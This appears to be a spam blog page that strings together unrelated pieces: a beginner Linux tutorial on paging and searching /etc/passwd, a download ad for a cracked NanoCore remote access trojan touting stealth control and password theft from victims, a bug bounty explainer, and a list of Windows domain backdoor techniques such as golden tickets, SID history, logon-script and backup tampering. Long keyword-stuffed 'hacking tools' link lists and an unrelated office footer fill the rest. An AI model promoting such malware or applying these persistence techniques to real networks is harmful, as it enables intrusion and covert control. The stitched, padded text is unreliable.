Linux Command Line Hackery Series - Part 4




Welcome back to Linux Command Line Hackery, hope you have enjoyed this series so far. Today we are going to learn new Linux commands and get comfortable with reading text files on Linux.

Suppose that you wanted to view your /etc/passwd file. How will you do that? From what we have learned so far what you'll do is type:

cat /etc/passwd

And there you go, but really did you see all the output in one terminal? No, you just ended up with last few lines and you'll have to cheat (i,e use graphical scroll bar) in order to see all the contents of /etc/passwd file. So is there a command line tool in linux with which we can see all the contents of a file easily without cheating? Yes, there are actually a few of them and in this article we'll look at some common ones.

Command: more
Syntax:  more [options] file...
Function: more is a filter for paging through text one screenful at a time. With more we can parse a file one terminal at a time or line by line. We can also go backward and forward a number of lines using more.

So if we're to use more on /etc/passwd file how will we do that? We'll simply type

more /etc/passwd

now we'll get a screenful output of the file and have a prompt at the bottom of terminal. In order to move forward one line at a time press <Enter Key>. Using enter we can scroll through the file one line at a time. If you want to move one screen at a time, you can press <Space Key> to move one screen at a time. There are more functions of more program, you can know about them by pressing <h key>. To exit out of more program simply type <q key> and you'll get out of more program.

Command: less
Syntax: less [options] file...
Function: less is similar to more but less has more functionality than more. less is particularly useful when reading large files as less does not have to read the entire input file before starting, so it starts up quickly than many other editors.

less command is based on more so what you've done above with more can be done with less as well. Try it out yourself.

Command: head
Syntax: head [OPTION]... [FILE]...
Function: head command prints the head or first part of a file. By default head prints out first 10 lines of a file. If more than one file is specified, head prints first 10 lines of all files as a default behavior.

If we want to see only first 10 lines of /etc/passwd we can type:

head /etc/passwd

We can also specify to head how many lines we want to view by using the -n flag. Suppose you want to see first 15 lines of /etc/passwd file you've to type:

head -n 15 /etc/passwd

Ok you can view the first lines of a file what about last lines, is there a tool for that also? Exactly that's what our next command will be about.

Command: tail
Syntax: tail [OPTION]... [FILE]...
Function: tail is opposite of head. It prints the last 10 lines of a file by default. And if more than one file is specified, tail prints last 10 lines of all files by default.

To view last 10 lines of /etc/passwd file you'll type:

tail /etc/passwd

and as is the case with head -n flag can be used to specify the number of lines

tail -n 15 /etc/passwd

Now one more thing that we're going to learn today is grep.

Command: grep
Syntax: grep [OPTIONS] PATTERN [FILE...]
Function: grep is used to search a file for lines matching the pattern specified in the command.

A PATTERN can simply be a word like "hello" or it can be a regular expression (in geek speak regex). If you aren't familiar with regex, it's ok we'll not dive into that it's a very big topic but if you want to learn about it I'll add a link at the end of this article that will help you get started with regex.

Now back to grep say we want to find a line in /etc/passwd file which contains my user if we'll simply type:

grep myusername /etc/passwd

Wohoo! It gives out just that data that we're looking for. Remember here myusername is your username.
One cool flag of grep is -v which is used to look in file for every line except the line containing the PATTERN specified after -v [it's lowercase v].

Take your time practicing with these commands especially grep and more. We'll learn a lot more about grep in other upcoming articles.

References:
https://en.wikipedia.org/wiki/Regular_expression
http://www.regular-expressions.info/
Awesome website to learn Regular expressions - http://www.regexr.com/

Continue reading


DOWNLOAD NANOCORE RAT 1.2.2.0 CRACKED – REMOTE ADMINISTRATION TOOL

NanoCore is one of the most powerful RATs ever created. It is capable of taking complete control of a victim's machine. It allows a user to control the system with a Graphical User Interface (GUI). It has many features which allow a user to access remote computer as an administrator. Download nanocore rat 1.2.2.0 cracked version free of cost.
NanoCore's developer was arrested by FBI and pleaded guilty in 2017 for developing such a malicious privacy threat, and sentenced 33 months in prison.

FEATURES

  • Complete Stealth Remote Control
  • Recover Passwords from the Victim Device
  • Manage Networks
  • Manage Files
  • Surveillance
  • Plugins (To take it to the next level)
  • Many advanced features like SCRIPTING

DOWNLOAD NANOCORE RAT 1.2.2.0 CRACKED – REMOTE ADMINISTRATION TOOL

Related links


  1. Hacking Tools Github
  2. Hacking Tools For Beginners
  3. Tools 4 Hack
  4. Pentest Tools For Android
  5. Pentest Tools Alternative
  6. Termux Hacking Tools 2019
  7. New Hack Tools
  8. Pentest Tools Website Vulnerability
  9. Hacker Tools Linux
  10. Hacking Tools
  11. Hack Tools For Ubuntu
  12. Pentest Tools Alternative
  13. Hacking Tools Github
  14. Hacking Tools Hardware
  15. Android Hack Tools Github
  16. Blackhat Hacker Tools
  17. Tools 4 Hack
  18. Best Hacking Tools 2020
  19. World No 1 Hacker Software
  20. Hacking Tools Free Download
  21. Best Pentesting Tools 2018
  22. Hack Tools For Mac
  23. Hacker Tools 2019
  24. Hacking Tools For Kali Linux
  25. Pentest Reporting Tools
  26. Pentest Tools Port Scanner
  27. Computer Hacker
  28. Best Hacking Tools 2020
  29. Hacking Tools Mac
  30. Hack Tools Download
  31. Hack Tools For Ubuntu
  32. Hacking App
  33. Nsa Hacker Tools
  34. Pentest Tools Nmap
  35. World No 1 Hacker Software
  36. Hacking Tools Kit
  37. Pentest Reporting Tools
  38. Hacker Tools
  39. Pentest Tools Framework
  40. Github Hacking Tools
  41. Hacker Tools Apk
  42. Hacker Tools Hardware
  43. How To Install Pentest Tools In Ubuntu
  44. Black Hat Hacker Tools
  45. Hacking Apps
  46. Hacking Tools
  47. Hack Tools For Windows
  48. Hacks And Tools
  49. Hacker Tools Free
  50. Hacking Tools Mac
  51. Pentest Tools For Ubuntu
  52. Hacking Tools
  53. Android Hack Tools Github
  54. Hacking Tools Windows
  55. Hacking Tools For Beginners
  56. Hacking Tools Pc
  57. Hacking Tools 2020
  58. Pentest Tools Port Scanner
  59. Pentest Tools For Mac
  60. Game Hacking
  61. Hacker Tools Mac
  62. World No 1 Hacker Software
  63. Hacker Tools Windows
  64. Hacker Hardware Tools
  65. New Hack Tools
  66. Hacking Tools Github
  67. Hacking Tools For Games
  68. Android Hack Tools Github
  69. Hacking Tools Kit
  70. How To Hack
  71. Hak5 Tools
  72. Termux Hacking Tools 2019
  73. Hacking Tools Windows
  74. Tools Used For Hacking
  75. Hack Tools For Pc
  76. Pentest Tools Website
  77. How To Install Pentest Tools In Ubuntu
  78. Hack And Tools
  79. Pentest Box Tools Download
  80. Hacker Tools For Windows
  81. Hacking Tools Free Download
  82. Pentest Tools Alternative
  83. Pentest Tools For Windows
  84. Pentest Tools For Windows
  85. Computer Hacker
  86. Hacker Tools For Mac
  87. Game Hacking
  88. Hack Apps
  89. Pentest Tools List
  90. Hacking Tools For Mac
  91. Nsa Hack Tools
  92. Pentest Tools Android
  93. Hacking Tools Windows
  94. How To Install Pentest Tools In Ubuntu
  95. Pentest Tools Kali Linux
  96. Hacker
  97. Hack Tools For Mac
  98. Pentest Box Tools Download
  99. Hackrf Tools
  100. Pentest Tools
  101. Hacking Tools 2020

$$$ Bug Bounty $$$

What is Bug Bounty ?



A bug bounty program, also called a vulnerability rewards program (VRP), is a crowdsourcing initiative that rewards individuals for discovering and reporting software bugs. Bug bounty programs are often initiated to supplement internal code audits and penetration tests as part of an organization's vulnerability management strategy.




Many software vendors and websites run bug bounty programs, paying out cash rewards to software security researchers and white hat hackers who report software vulnerabilities that have the potential to be exploited. Bug reports must document enough information for for the organization offering the bounty to be able to reproduce the vulnerability. Typically, payment amounts are commensurate with the size of the organization, the difficulty in hacking the system and how much impact on users a bug might have.


Mozilla paid out a $3,000 flat rate bounty for bugs that fit its criteria, while Facebook has given out as much as $20,000 for a single bug report. Google paid Chrome operating system bug reporters a combined $700,000 in 2012 and Microsoft paid UK researcher James Forshaw $100,000 for an attack vulnerability in Windows 8.1.  In 2016, Apple announced rewards that max out at $200,000 for a flaw in the iOS secure boot firmware components and up to $50,000 for execution of arbitrary code with kernel privileges or unauthorized iCloud access.


While the use of ethical hackers to find bugs can be very effective, such programs can also be controversial. To limit potential risk, some organizations are offering closed bug bounty programs that require an invitation. Apple, for example, has limited bug bounty participation to few dozen researchers.

Related articles


  1. What Are Hacking Tools
  2. Hacking Tools For Pc
  3. Hacking Tools Usb
  4. Hack And Tools
  5. Pentest Tools Apk
  6. Pentest Tools Website
  7. Computer Hacker
  8. Bluetooth Hacking Tools Kali
  9. Hacking Tools Usb
  10. Tools Used For Hacking
  11. Hacking Apps
  12. Pentest Tools Tcp Port Scanner
  13. Hacker Tools Apk
  14. Tools 4 Hack
  15. Hacking Tools Free Download
  16. Hack Tool Apk
  17. Hacker Tools Apk Download
  18. Pentest Tools Website Vulnerability
  19. What Is Hacking Tools
  20. Pentest Tools Subdomain
  21. Pentest Tools Free
  22. Hack Tools Github
  23. What Are Hacking Tools
  24. How To Install Pentest Tools In Ubuntu
  25. Pentest Tools For Ubuntu
  26. Pentest Tools For Mac
  27. Hackrf Tools
  28. Hack Tools Online
  29. Hacker Tools For Pc
  30. Hacking Tools Download
  31. Hack Tool Apk
  32. Hacking Tools Windows 10
  33. Hacker Tool Kit
  34. Best Hacking Tools 2020
  35. Hack Apps
  36. Pentest Recon Tools
  37. Hack Rom Tools
  38. Hacking Tools Software
  39. Best Hacking Tools 2019
  40. Hacker Tools Free Download
  41. Hak5 Tools
  42. Pentest Tools
  43. Hack Tools
  44. Hack Tools Github
  45. Hacking Tools For Kali Linux
  46. Pentest Tools List
  47. Hack Tools
  48. Hacker Tools For Ios
  49. Pentest Tools List
  50. Hacking Apps
  51. Growth Hacker Tools
  52. Tools Used For Hacking
  53. Best Pentesting Tools 2018
  54. Best Pentesting Tools 2018
  55. Hacking Tools Github
  56. Hack Tool Apk No Root
  57. Usb Pentest Tools
  58. Pentest Tools Windows
  59. Hacker Search Tools
  60. Hacker Search Tools
  61. Usb Pentest Tools
  62. Pentest Tools For Android
  63. Blackhat Hacker Tools
  64. Usb Pentest Tools
  65. Physical Pentest Tools
  66. Android Hack Tools Github
  67. Pentest Tools Android
  68. Pentest Tools
  69. Hack Tools
  70. Pentest Tools Alternative
  71. Kik Hack Tools
  72. Pentest Tools Free
  73. Best Hacking Tools 2020
  74. Hacking Tools Software
  75. Hacker Tools Software
  76. Hacker Tools Mac
  77. Pentest Tools Free
  78. New Hacker Tools
  79. Hack Tools For Games
  80. Hacking Tools Software
  81. Pentest Tools Subdomain
  82. Hack Tools Mac
  83. Hacker Tools 2019
  84. Hacking Tools 2019
  85. Game Hacking
  86. New Hack Tools
  87. Hackrf Tools
  88. Hack And Tools
  89. Pentest Tools Linux
  90. Hak5 Tools
  91. Hack And Tools
  92. Pentest Tools Subdomain
  93. Hack Tools Github
  94. Hacking Tools For Beginners
  95. Hacking Tools And Software
  96. Bluetooth Hacking Tools Kali
  97. Pentest Tools Website
  98. Hacker Tools Free
  99. Pentest Tools Tcp Port Scanner
  100. Android Hack Tools Github
  101. New Hacker Tools
  102. Pentest Tools List
  103. Hacking Tools Kit
  104. Best Pentesting Tools 2018
  105. Pentest Tools Port Scanner
  106. Top Pentest Tools
  107. Blackhat Hacker Tools
  108. Hack Tool Apk No Root
  109. Hacking Tools Usb
  110. Hack Tools For Games
  111. Hacking Tools Windows 10
  112. Hacker Tools Free Download
  113. Pentest Tools Nmap
  114. Physical Pentest Tools
  115. Pentest Tools For Android
  116. How To Make Hacking Tools
  117. Hacking Tools And Software
  118. Hacking Tools Mac
  119. Android Hack Tools Github
  120. Best Hacking Tools 2019
  121. Hacker Tools
  122. Hacker Tools Linux
  123. Tools 4 Hack
  124. Pentest Reporting Tools
  125. Hacking Tools For Mac
  126. Hak5 Tools
  127. Hacker Tools List
  128. New Hack Tools
  129. Hack Rom Tools

Thousand Ways To Backdoor A Windows Domain (Forest)

When the Kerberos elevation of privilege (CVE-2014-6324 / MS14-068) vulnerability has been made public, the remediation paragraph of the following blog post made some waves:
http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx

"The only way a domain compromise can be remediated with a high level of certainty is a complete rebuild of the domain."

Personally, I agree with this, but .... But whether this is the real solution, I'm not sure. And the same applies to compromised computers. When it has been identified that malware was able to run on the computer (e.g. scheduled scan found the malware), there is no easy way to determine with 100% certainty that there is no rootkit on the computer. Thus rebuilding the computer might be a good thing to consider. For paranoids, use new hardware ;)

But rebuilding a single workstation and rebuilding a whole domain is not on the same complexity level. Rebuilding a domain can take weeks or months (or years, which will never happen, as the business will close before that).

There are countless documented methods to backdoor a computer, but I have never seen a post where someone collects all the methods to backdoor a domain. In the following, I will refer to domain admin, but in reality, I mean Domain Admins, Enterprise Admins, and Schema Admins.


Ways to backdoor a domain

So here you go, an incomplete list to backdoor a domain:

  • Create a new domain admin user. Easy to do, easy to detect, easy to remediate
  • Dump password hashes. The attacker can either crack those or just pass-the-hash. Since KB2871997, pass-the-hash might be trickier (https://technet.microsoft.com/library/security/2871997), but not impossible. Easy to do, hard to detect, hard to remediate - just think about service user passwords. And during remediation, consider all passwords compromised, even strong ones.
  • Logon scripts - modify the logon scripts and add something malicious in it. Almost anything detailed in this post can be added :D
  • Use an already available account, and add domain admin privileges to that. Reset its password. Mess with current group memberships - e.g. http://www.exploit-db.com/papers/17167/
  • Backdoor any workstation where domain admins login. While remediating workstations, don't forget to clean the roaming profile. The type of backdoor can use different forms: malware, local admin, password (hidden admin with 500 RID), sticky keys, etc.
  • Backdoor any domain controller server. For advanced attacks, see Skeleton keys 
  • Backdoor files on network shares which are commonly used by domain admins by adding malware to commonly used executables - Backdoor factory
  • Change ownership/permissions on AD partitions - if you have particular details on how to do this specifically, please comment
  • Create a new domain user. Hide admin privileges with SID history. Easy to do, hard to detect, easy to remediate - check Mimikatz experimental for addsid
  • Golden tickets - easy to do, hard to detect, medium remediation
  • Silver tickets - easy to do, hard to detect, medium/hard remediation
  • Backdoor workstations/servers via group policy
    • HKEY_LOCAL_MACHINE\ Software\ Microsoft\ Windows\ CurrentVersion\ RunOnce,
    • scheduled tasks (run task 2 years later),
    • sticky-keys with debug
  • Backdoor patch management tool, see slides here
[Update 2017.01.10]


Other tricks

The following list does not fit in the previous "instant admin" tips, but still, it can make the attackers life easier if their primary foothold has been disabled:

  • Backdoor recent backups - and when the backdoor is needed, destroy the files, so the files will be restored from the backdoored backup
  • Backdoor the Exchange server - get a copy of emails
  • Backdoor workstation/server golden image
  • Change permission of logon scripts to allow modification later
  • Place malicious symlinks to file shares, collect hashes via SMB auth tries on specified IP address, grab password hashes later
  • Backdoor remote admin management e.g. HP iLO - e.g. create new user or steal current password
  • Backdoor files e.g. on shares to use in SMB relay
  • Backdoor source code of in-house-developed software
  • Use any type of sniffed or reused passwords in new attacks, e.g. network admin, firewall admin, VPN admin, AV admin, etc.
  • Change the content of the proxy pac file (change browser configuration if necessary), including special exception(s) for a chosen domain(s)  to use proxy on malicious IP. Redirect the traffic, enforce authentication, grab password hashes, ???, profit.
  • Create high privileged users in applications running with high privileges, e.g. MSSQL, Tomcat, and own the machine, impersonate users, grab their credentials, etc. The typical pentest path made easy.
  • Remove patches from servers, change patch policy not to install those patches.
  • Steal Windows root/intermediate CA keys
  • Weaken AD security by changing group policy (e.g. re-enabling LM-hashes)
Update [2015-09-27]: I found this great presentation from Jakob Heidelberg. It mentions (at least) the following techniques, it is worth to check these:
  • Microsoft Local Administrator Password Solution
  • Enroll virtual smart card certificates for domain admins

Forensics

If you have been chosen to remediate a network where attackers gained domain admin privileges, well, you have a lot of things to look for :)

I can recommend two tools which can help you during your investigation:

Lessons learned

But guess what, not all of these problems are solved by rebuilding the AD. One has to rebuild all the computers from scratch as well. Which seems quite impossible. When someone is creating a new AD, it is impossible not to migrate some configuration/data/files from the old domain. And whenever this happens, there is a risk that the new AD will be backdoored as well.

Ok, we are doomed, but what can we do? I recommend proper log analysis, analyze trends, and detect strange patterns in your network. Better spend money on these, than on the domain rebuild. And when you find something, do a proper incident response. And good luck!

Ps: Thanks to Andrew, EQ, and Tileo for adding new ideas to this post.

Check out the host backdooring post as well! :)

More info


  1. Pentest Recon Tools
  2. Hack Tools For Ubuntu
  3. Hack And Tools
  4. Hacker Tools Windows
  5. New Hacker Tools
  6. Hacker Tools Mac
  7. Pentest Tools For Windows
  8. Pentest Tools Online
  9. Hacking Tools 2019
  10. Game Hacking
  11. Pentest Tools Alternative
  12. Install Pentest Tools Ubuntu
  13. Free Pentest Tools For Windows
  14. How To Make Hacking Tools
  15. Hacking Tools Pc
  16. Best Hacking Tools 2019
  17. Hacking Tools Free Download
  18. World No 1 Hacker Software
  19. Hacker Tools Free
  20. Hacker Tools Free Download
  21. Bluetooth Hacking Tools Kali
  22. Pentest Box Tools Download
  23. Pentest Automation Tools
  24. What Are Hacking Tools
  25. Beginner Hacker Tools
  26. Hacking App
  27. Hack Tools Download
  28. Hacker
  29. Hack Tools Pc
  30. Hack Tools For Pc
  31. Hack Tool Apk
  32. Hacking Tools Download
  33. Free Pentest Tools For Windows
  34. Pentest Tools For Android
  35. Wifi Hacker Tools For Windows
  36. Hacking Tools
  37. Hacker Tools 2020
  38. Pentest Tools List
  39. Hack Tools For Ubuntu
  40. Hack App
  41. Best Hacking Tools 2019
  42. Pentest Tools For Windows
  43. Best Hacking Tools 2019
  44. Easy Hack Tools
  45. Hacks And Tools
  46. Black Hat Hacker Tools
  47. Hack Apps
  48. Best Hacking Tools 2019
  49. Hacker Tools Online
  50. Hack Apps
  51. Nsa Hack Tools
  52. Pentest Recon Tools
  53. Hack Tools Online
  54. Kik Hack Tools
  55. Hacking Tools And Software
  56. Best Hacking Tools 2020
  57. Kik Hack Tools
  58. Hack Tools For Games
  59. Hacker Techniques Tools And Incident Handling
  60. Tools For Hacker
  61. Physical Pentest Tools
  62. Hacking Tools Windows 10
  63. Pentest Tools Android
  64. Hacking Tools
  65. Pentest Tools Open Source
  66. Hacker Tools 2019
  67. Hacker Security Tools
  68. Hack And Tools
  69. Hacker Tools List
  70. Pentest Tools Alternative
  71. Hacking Apps
  72. Hack Tools Mac
  73. Beginner Hacker Tools
  74. Hack Tools For Windows
  75. Hacking App
  76. Hacker Tools For Mac
  77. Best Pentesting Tools 2018
  78. Black Hat Hacker Tools
  79. Hacking Tools Download
  80. Hacking Tools Software
  81. Hacking Tools Windows 10
  82. Hackers Toolbox
  83. Hacking Tools For Mac
  84. New Hack Tools
  85. Pentest Tools Linux
  86. Hacking Tools For Windows
  87. Hacker Tools Mac
  88. Hack Rom Tools
  89. Hacking Tools Name
  90. Hack Tools For Pc
  91. Pentest Recon Tools
  92. Hacking App
  93. Hacking Tools Github
  94. World No 1 Hacker Software
  95. Black Hat Hacker Tools
  96. Pentest Tools Alternative
  97. Pentest Tools For Ubuntu
  98. Pentest Box Tools Download
  99. Hacker Tools 2020
  100. Hacker Tools Github
  101. Hack App
  102. Hacker Tools 2020
  103. Hacker Search Tools
  104. Hack Tool Apk
  105. Tools For Hacker
  106. Hack Tools Online
  107. Hack Tool Apk No Root
  108. Hacking Tools
  109. Hacking Tools Hardware
  110. Hack And Tools
  111. Pentest Tools List
  112. Hacking Tools For Kali Linux
  113. Pentest Tools Kali Linux
  114. Hack Apps
  115. Hacking Tools Download

Remember...

If you want more information on any of these news updates, do feel free to call the office at any time! 02890673379
or email office@summermadness.co.uk
....or check out the rest of the SM website